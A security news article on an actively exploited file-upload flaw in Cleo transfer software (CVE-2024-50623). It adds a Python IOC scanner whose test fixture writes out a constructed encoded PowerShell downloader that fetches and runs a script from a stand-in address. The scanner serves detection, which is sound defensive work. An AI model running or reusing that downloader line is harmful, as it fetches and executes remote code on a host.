Cleo transfer software: put it behind a firewall, patch ineffective
Cleo had plugged a security hole in its data transfer software, but insufficiently. The vulnerability is being actively exploited.
(Image: created with AI in Bing Designer by heise online / dmk)
Cleo produces data transfer software in which it recently patched a security vulnerability – supposedly. The patch is insufficient, and the vulnerability is being actively exploited in the wild. Until an effective update is available, IT managers should place Cleo servers behind a firewall to protect them.
IT security researchers at Huntress describe their observations in a recent blog post. The vulnerability in question is an unrestricted file upload in Cleo Harmony, VLTrader and LexiCom prior to version 5.8.0.21 that can be abused to execute malicious code from the network (CVE-2024-50623). In a separate security advisory updated on Tuesday morning, Cleo's developers write that installing the most recently released patch closes additional attack vectors for the vulnerability.
IT researchers: Patch ineffective
At around the same time, Huntress published its own analysis on Reddit. According to this, even the patched version 5.8.0.21 is still vulnerable. An indicator of compromise (IOC) can be found in the "hosts" subdirectory, for example: the files "main.xml" or "60282967-dc91-40ef-a34c-38e992509c2c.xml" (the latter file name appeared in several infections) containing an embedded, encoded PowerShell command are clear signs of compromise.
Huntress continues to update the blog post with further IOCs. A significant increase in compromised servers has been observed since December 8. Using a proof-of-concept exploit, the researchers reproduced the attacks and found that the current patches are inadequate. Huntress is in contact with Cleo, which has announced that it will provide new patches as soon as possible.
Until then, Huntress recommends reducing the attack surface with a configuration change that blocks part of the attack chain. The malicious code is executed via an "autoruns" directory; this can be disabled under "Configure" – "Options" – "Other" by clearing the "Autorun Directory" field. However, this does not fix the unrestricted file upload itself. Huntress therefore writes: "We strongly recommend putting any Cleo system exposed to the Internet behind a firewall until a new patch has been released." The IOCs also include the IP addresses from which the PowerShell commands download further malicious code.
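To make the IOC check described above concrete, here is an added example scanner (not code from Huntress, Cleo or heise) that sweeps a Cleo "hosts" directory for XML files containing an encoded PowerShell command, decodes the command (base64 over UTF-16LE text, which is what -EncodedCommand expects) and pulls out any download URLs for comparison with the published IOC list. The sample files, their XML structure, the file names partner-sftp.xml and ops-check.xml, and the address 198.51.100.23 (a TEST-NET range) are constructed for this example; only the two file names from the Huntress report are taken from the article.

```python
"""IOC sweep of a Cleo "hosts" directory for XML files carrying an encoded PowerShell command.

Added illustration, not Huntress or Cleo code. The directory layout, the sample XML
structure, the file names partner-sftp.xml / ops-check.xml and the download address
198.51.100.23 (TEST-NET-2) are constructed for this example.
"""
import base64
import re
import tempfile
from dataclasses import dataclass, field
from pathlib import Path

# File names Huntress reported seeing in several infections (named in the article).
KNOWN_NAMES = {"main.xml", "60282967-dc91-40ef-a34c-38e992509c2c.xml"}

# powershell[.exe] <switches> -e/-ec/-en/-enc/-EncodedCommand <base64>
# The lazy [^<"']*? keeps the match inside one XML text node or attribute value,
# and the mandatory whitespace after the switch avoids matching -ExecutionPolicy.
ENCODED_PS = re.compile(
    r'''powershell(?:\.exe)?[^<"']*?-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})''',
    re.IGNORECASE,
)
URL_RE = re.compile(r'''https?://[^\s"'<>]+''', re.IGNORECASE)


@dataclass
class Finding:
    path: str
    known_name: bool          # matches one of the file names from the Huntress report
    decoded_command: str
    urls: list = field(default_factory=list)   # download locations to compare with IOC lists


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand payloads are base64 over UTF-16LE text."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le", errors="replace")


def scan_hosts_dir(hosts_dir) -> list:
    """Return one Finding per encoded PowerShell command found in hosts/*.xml."""
    findings = []
    for xml_path in sorted(Path(hosts_dir).glob("*.xml")):
        text = xml_path.read_text(encoding="utf-8", errors="replace")
        for match in ENCODED_PS.finditer(text):
            try:
                cmd = decode_encoded_command(match.group(1))
            except ValueError:            # binascii.Error is a ValueError subclass
                cmd = "<undecodable base64>"
            findings.append(Finding(str(xml_path), xml_path.name in KNOWN_NAMES,
                                    cmd, URL_RE.findall(cmd)))
    return findings


def build_sample_hosts_dir(root) -> Path:
    """Write constructed sample files: two benign host definitions and one IOC hit."""
    hosts = Path(root) / "hosts"
    hosts.mkdir()
    (hosts / "partner-sftp.xml").write_text(
        '<Host alias="partner-sftp"><Address>sftp.example.com</Address></Host>')
    # A PowerShell invocation without -EncodedCommand: must not be reported.
    (hosts / "ops-check.xml").write_text(
        '<Host alias="ops-check"><Command>powershell -ExecutionPolicy Bypass -File check.ps1</Command></Host>')
    # Constructed stand-in for the reported malicious file: a downloader one-liner,
    # encoded the way -EncodedCommand expects (UTF-16LE, then base64).
    payload = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/stage.ps1')"
    b64 = base64.b64encode(payload.encode("utf-16-le")).decode("ascii")
    (hosts / "60282967-dc91-40ef-a34c-38e992509c2c.xml").write_text(
        f'<Host alias="60282967-dc91-40ef-a34c-38e992509c2c">'
        f'<Command>powershell.exe -NoP -W Hidden -enc {b64}</Command></Host>')
    return hosts


def demo() -> list:
    """Build the sample directory in a temporary location and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_hosts_dir(build_sample_hosts_dir(tmp))


if __name__ == "__main__":
    for f in demo():
        flag = " (known file name)" if f.known_name else ""
        print(f"[IOC] {f.path}{flag}\n      command: {f.decoded_command}\n      urls: {f.urls}")
```

In practice, point scan_hosts_dir at the "hosts" subdirectory of the Cleo installation. Any hit is a strong compromise indicator; the decoded command and the extracted URLs are what you compare against the IP addresses in the Huntress IOC list and hand to incident response. A clean sweep is not proof that the host was never exploited, since the configuration change does not close the upload itself.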
Data transfer software is a popular target for cyber criminals: the potential damage from ransomware or data extortion is huge. Last year, for example, the criminal group cl0p exploited security vulnerabilities in Progress's MOVEit Transfer on a large scale to copy sensitive data from hundreds of well-known companies. IT managers should therefore act quickly so as not to fall victim to an attack.
Cleo has since released an updated security advisory together with version 5.8.0.24 of the affected software, which the company says fully fixes the vulnerability.
(dmk)